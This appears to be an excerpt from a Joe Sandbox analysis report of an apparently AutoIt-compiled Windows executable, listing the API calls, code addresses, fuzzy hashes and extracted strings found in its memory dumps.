                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: 07287aac3803a186d2f9f70e2160f8f2ef051e90ea4ebdf2887291b6d8fd37de
                                                              • Instruction ID: 86264f658ca5d7b0c97f457684b5e1a88eb2ed2600d0255991271b7ab67fb577
                                                              • Opcode Fuzzy Hash: 07287aac3803a186d2f9f70e2160f8f2ef051e90ea4ebdf2887291b6d8fd37de
                                                              • Instruction Fuzzy Hash: 08917F712083019BDF04EF10C861E6EB7E1AF95360F45446DF8965B3A2CB79ED4AEB81
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F9B8B4
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F991C2), ref: 00F9B910
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F9B949
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F9B98C
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F9B9C3
                                                              • FreeLibrary.KERNEL32(?), ref: 00F9B9CF
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F9B9DF
                                                              • DestroyIcon.USER32(?,?,?,?,?,00F991C2), ref: 00F9B9EE
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F9BA0B
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F9BA17
                                                                • Part of subcall function 00F32EFD: __wcsicmp_l.LIBCMT ref: 00F32F86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1212759294-1154884017
                                                              • Opcode ID: 8db3edc4b88ebac06dca4a9cb491f1d61d6c2b31785ec4ff62c205bef03ff6d7
                                                              • Instruction ID: b9424335115d7d53c48ac2199f5df697cb70f2a6df47a4862d246c1e23eb45b7
                                                              • Opcode Fuzzy Hash: 8db3edc4b88ebac06dca4a9cb491f1d61d6c2b31785ec4ff62c205bef03ff6d7
                                                              • Instruction Fuzzy Hash: F961E071900219BAFF14DF64DD46FBE77ACEB08720F10411AFA15D61C0DB749A84EBA0
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 00F7DCDC
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F7DCEC
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F7DCF8
                                                              • __wsplitpath.LIBCMT ref: 00F7DD56
                                                              • _wcscat.LIBCMT ref: 00F7DD6E
                                                              • _wcscat.LIBCMT ref: 00F7DD80
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F7DD95
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7DDA9
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7DDDB
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7DDFC
                                                              • _wcscpy.LIBCMT ref: 00F7DE08
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F7DE47
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                              • String ID: *.*
                                                              • API String ID: 3566783562-438819550
                                                              • Opcode ID: 0f1b9d0f0f943bbaab152c206a893430b5da2f9e47eff75849b118f2fddb5153
                                                              • Instruction ID: 5a1d5af04cdfe1c9bfa163e0b8da8738942c9f53f29dd7215e9be345d08ae902
                                                              • Opcode Fuzzy Hash: 0f1b9d0f0f943bbaab152c206a893430b5da2f9e47eff75849b118f2fddb5153
                                                              • Instruction Fuzzy Hash: ED616D725082059FCB10EF20C854A9EB3F8FF89324F44891EF989C7251DB75EA45DB92
                                                              APIs
                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00F79C7F
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F79CA0
                                                              • __swprintf.LIBCMT ref: 00F79CF9
                                                              • __swprintf.LIBCMT ref: 00F79D12
                                                              • _wprintf.LIBCMT ref: 00F79DB9
                                                              • _wprintf.LIBCMT ref: 00F79DD7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 311963372-3080491070
                                                              • Opcode ID: c50ca43afe40a41c1eac49541f9a6747f7787c14ac564e53370ce0a1d1b97a30
                                                              • Instruction ID: 61d3d4257b4153b4a3e4d651b07160f840735beed77d5681dfd23b8129ab4103
                                                              • Opcode Fuzzy Hash: c50ca43afe40a41c1eac49541f9a6747f7787c14ac564e53370ce0a1d1b97a30
                                                              • Instruction Fuzzy Hash: 8C51953190460AAACF14FBE0DD46EEEB779AF04301F504066F509720A1EB796F99FB61
                                                              APIs
                                                                • Part of subcall function 00F19837: __itow.LIBCMT ref: 00F19862
                                                                • Part of subcall function 00F19837: __swprintf.LIBCMT ref: 00F198AC
                                                              • CharLowerBuffW.USER32(?,?), ref: 00F7A3CB
                                                              • GetDriveTypeW.KERNEL32 ref: 00F7A418
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F7A460
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F7A497
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F7A4C5
                                                                • Part of subcall function 00F17BCC: _memmove.LIBCMT ref: 00F17C06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 2698844021-4113822522
                                                              • Opcode ID: 4de74fc3f2232f4e9d10eeafecea0a46d35556cb6502e51a0fe4cd98abfc3723
                                                              • Instruction ID: e523472ac9df6404d1aff9bf494cbaa697c5d03ee9eb351e5ad56a9f0e9df888
                                                              • Opcode Fuzzy Hash: 4de74fc3f2232f4e9d10eeafecea0a46d35556cb6502e51a0fe4cd98abfc3723
                                                              • Instruction Fuzzy Hash: F6514C715083059FC700EF10CD919AAB3F4EF84768F40886DF89A97261DB75ED4AEB82
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00F4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00F6F8DF
                                                              • LoadStringW.USER32(00000000,?,00F4E029,00000001), ref: 00F6F8E8
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                              • GetModuleHandleW.KERNEL32(00000000,00FD5310,?,00000FFF,?,?,00F4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00F6F90A
                                                              • LoadStringW.USER32(00000000,?,00F4E029,00000001), ref: 00F6F90D
                                                              • __swprintf.LIBCMT ref: 00F6F95D
                                                              • __swprintf.LIBCMT ref: 00F6F96E
                                                              • _wprintf.LIBCMT ref: 00F6FA17
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F6FA2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                              • API String ID: 984253442-2268648507
                                                              • Opcode ID: bccb039a275a2c945bac270b1bf8853aaf2e6942356d8591e2a06c99087fc772
                                                              • Instruction ID: abc7e42cc67a2da3f9a5b8973fff9f2c24b82cb6d224dc808f8dff704ba65708
                                                              • Opcode Fuzzy Hash: bccb039a275a2c945bac270b1bf8853aaf2e6942356d8591e2a06c99087fc772
                                                              • Instruction Fuzzy Hash: 5841307280420DAACF04FBE0DD86EEE7778AF54351F500465F509B6092EB396F89EB61
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F99207,?,?), ref: 00F9BA56
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F99207,?,?,00000000,?), ref: 00F9BA6D
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F99207,?,?,00000000,?), ref: 00F9BA78
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00F99207,?,?,00000000,?), ref: 00F9BA85
                                                              • GlobalLock.KERNEL32(00000000), ref: 00F9BA8E
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F99207,?,?,00000000,?), ref: 00F9BA9D
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00F9BAA6
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00F99207,?,?,00000000,?), ref: 00F9BAAD
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F99207,?,?,00000000,?), ref: 00F9BABE
                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FA2CAC,?), ref: 00F9BAD7
                                                              • GlobalFree.KERNEL32(00000000), ref: 00F9BAE7
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00F9BB0B
                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F9BB36
                                                              • DeleteObject.GDI32(00000000), ref: 00F9BB5E
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F9BB74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: 770845de14bbf834332667f00a290382c696895d7c5849cbed7e239d90f329d8
                                                              • Instruction ID: 59faa7b3f7b0842dbf34e9d9446fb34093f4dceb98600fa4ca170d3375eb59e2
                                                              • Opcode Fuzzy Hash: 770845de14bbf834332667f00a290382c696895d7c5849cbed7e239d90f329d8
                                                              • Instruction Fuzzy Hash: 57415B75A00208EFDB119F65ED88EAB7BB8FF89721F104069F90AD7260C7309D45EB60
                                                              APIs
                                                              • __wsplitpath.LIBCMT ref: 00F7DA10
                                                              • _wcscat.LIBCMT ref: 00F7DA28
                                                              • _wcscat.LIBCMT ref: 00F7DA3A
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F7DA4F
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7DA63
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00F7DA7B
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F7DA95
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7DAA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                              • String ID: *.*
                                                              • API String ID: 34673085-438819550
                                                              • Opcode ID: 5a32089f830ebe820079d7fd27c1411f5242ccd41ae22352966378137a1e8005
                                                              • Instruction ID: 95f82284f7e69a271e0b030a77771668cecea18fd3b6aa342e74bd096208cb0b
                                                              • Opcode Fuzzy Hash: 5a32089f830ebe820079d7fd27c1411f5242ccd41ae22352966378137a1e8005
                                                              • Instruction Fuzzy Hash: 198183729042419FCB24DF64C844AAAB7F4BF89324F58882FF98DC7251D634D945EB53
                                                              APIs
                                                                • Part of subcall function 00F12612: GetWindowLongW.USER32(?,000000EB), ref: 00F12623
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F9C1FC
                                                              • GetFocus.USER32 ref: 00F9C20C
                                                              • GetDlgCtrlID.USER32(00000000), ref: 00F9C217
                                                              • _memset.LIBCMT ref: 00F9C342
                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F9C36D
                                                              • GetMenuItemCount.USER32(?), ref: 00F9C38D
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00F9C3A0
                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F9C3D4
                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F9C41C
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F9C454
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F9C489
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                              • String ID: 0
                                                              • API String ID: 1296962147-4108050209
                                                              • Opcode ID: c961c59c4ddeb5bcc9a07b5a0ed32c8e135fc0da436ce62d7be29ce95756ad18
                                                              • Instruction ID: a933fca03cb262c614285a92da515277710c4662b87865636e395c02ec1420fd
                                                              • Opcode Fuzzy Hash: c961c59c4ddeb5bcc9a07b5a0ed32c8e135fc0da436ce62d7be29ce95756ad18
                                                              • Instruction Fuzzy Hash: 3F81A1716083059FEB14CF28C894A7BBBE5FF88724F14492EF99597291C730D904EB92
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00F8738F
                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F8739B
                                                              • CreateCompatibleDC.GDI32(?), ref: 00F873A7
                                                              • SelectObject.GDI32(00000000,?), ref: 00F873B4
                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F87408
                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F87444
                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F87468
                                                              • SelectObject.GDI32(00000006,?), ref: 00F87470
                                                              • DeleteObject.GDI32(?), ref: 00F87479
                                                              • DeleteDC.GDI32(00000006), ref: 00F87480
                                                              • ReleaseDC.USER32(00000000,?), ref: 00F8748B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: c9c4548ef205dca769390a4daed17b4246c8963563c413e66cb6c7a906d70893
                                                              • Instruction ID: 4fdf11a7ae12cf533c41bb5319803d31a61fa4d63f2e5dff67cab200bbaa3672
                                                              • Opcode Fuzzy Hash: c9c4548ef205dca769390a4daed17b4246c8963563c413e66cb6c7a906d70893
                                                              • Instruction Fuzzy Hash: 1D513975904309EFCB15DFA9CC85EAEBBB9EF48310F24842AF95AD7221C731A9449B50
                                                              APIs
                                                                • Part of subcall function 00F30957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F16B0C,?,00008000), ref: 00F30973
                                                                • Part of subcall function 00F14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F14743,?,?,00F137AE,?), ref: 00F14770
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F16BAD
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F16CFA
                                                                • Part of subcall function 00F1586D: _wcscpy.LIBCMT ref: 00F158A5
                                                                • Part of subcall function 00F3363D: _iswctype.LIBCMT ref: 00F33645
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 537147316-1018226102
                                                              • Opcode ID: 4e18d0e354cd932691d7d94030e8b5a8175cde2f832114365e3fd6f50c23ca91
                                                              • Instruction ID: 13516a763162bcc6217c83bcb3e7fa596528f7812d34881d4e9d9ba0782a5619
                                                              • Opcode Fuzzy Hash: 4e18d0e354cd932691d7d94030e8b5a8175cde2f832114365e3fd6f50c23ca91
                                                              • Instruction Fuzzy Hash: 6602AD315083419FC714EF20C881AAFBBE5BFD4324F14491DF89A972A1DB38D989EB42
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F72D50
                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F72DDD
                                                              • GetMenuItemCount.USER32(00FD5890), ref: 00F72E66
                                                              • DeleteMenu.USER32(00FD5890,00000005,00000000,000000F5,?,?), ref: 00F72EF6
                                                              • DeleteMenu.USER32(00FD5890,00000004,00000000), ref: 00F72EFE
                                                              • DeleteMenu.USER32(00FD5890,00000006,00000000), ref: 00F72F06
                                                              • DeleteMenu.USER32(00FD5890,00000003,00000000), ref: 00F72F0E
                                                              • GetMenuItemCount.USER32(00FD5890), ref: 00F72F16
                                                              • SetMenuItemInfoW.USER32(00FD5890,00000004,00000000,00000030), ref: 00F72F4C
                                                              • GetCursorPos.USER32(?), ref: 00F72F56
                                                              • SetForegroundWindow.USER32(00000000), ref: 00F72F5F
                                                              • TrackPopupMenuEx.USER32(00FD5890,00000000,?,00000000,00000000,00000000), ref: 00F72F72
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F72F7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                              • String ID:
                                                              • API String ID: 3993528054-0
                                                              • Opcode ID: eb4b8518fb0d87c53f9dc72da5e9d10cc503b5626e04cb0f188e1d7eef7ae998
                                                              • Instruction ID: 644fe50aae173c49d6f9e6c0f752e16e51288d30e21709afbda4f3cf41d44ae5
                                                              • Opcode Fuzzy Hash: eb4b8518fb0d87c53f9dc72da5e9d10cc503b5626e04cb0f188e1d7eef7ae998
                                                              • Instruction Fuzzy Hash: CE71D471A00209BBEB618F54DC85FAABF64FF04724F148217F629AA1E1C7B15C64F792
                                                              APIs
                                                                • Part of subcall function 00F17BCC: _memmove.LIBCMT ref: 00F17C06
                                                              • _memset.LIBCMT ref: 00F6786B
                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F678A0
                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F678BC
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F678D8
                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F67902
                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F6792A
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F67935
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F6793A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
